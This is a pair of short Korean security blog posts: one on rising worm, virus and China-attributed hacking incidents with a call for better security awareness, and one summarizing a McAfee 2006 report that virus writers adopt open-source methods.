그리고 주요 사고 유형별 현황을 보면 지난 1년단 웜,바이러스에 대한 사고가 많으며 최근에는 중국발(中國發) 해킹으로 인하여 여러가지 해킹의 난이도 및 자동화툴로 인하여 해당싸이트에 숙주해 있다가 패치가 안된 운영체제를 사용하는 유저가 접속하게 되면 그 파급효과는 상당한 것이다.

따라서 그런 수치는 7월 이후로 계속 꾸준히 증가하고 있으며 근본적인 대책이 강구가 되어야 할것이다.  그것은 정보보호에 대한 인식의 확대와 마인드를 함양함으로 인하여 나 스스로가 정보보호에 대한 관심을 가짐으로 인하여 1.25 대란과 같은 사항을 막을수 있을 것이다.

<전주현>
신고
Posted by 엔시스
보안회사인 맥아피의 Global Threat Report for 2006에 따르면 소스코드와 아이디어를
자유롭게 나눌수 있도록 오픈소스를 사용하는데 경고한다고 말했다. 심지어 소스코드를
배포하는 설명서를 포함하고 직접 그것을 프로그램으로 적용 하기도 한다고 말했다.

기사원문 : http://news.com.com/Virus+writers+use+open-source+methods/2100-7355_3-6094779.html?tag=cd.top

신고
Posted by 엔시스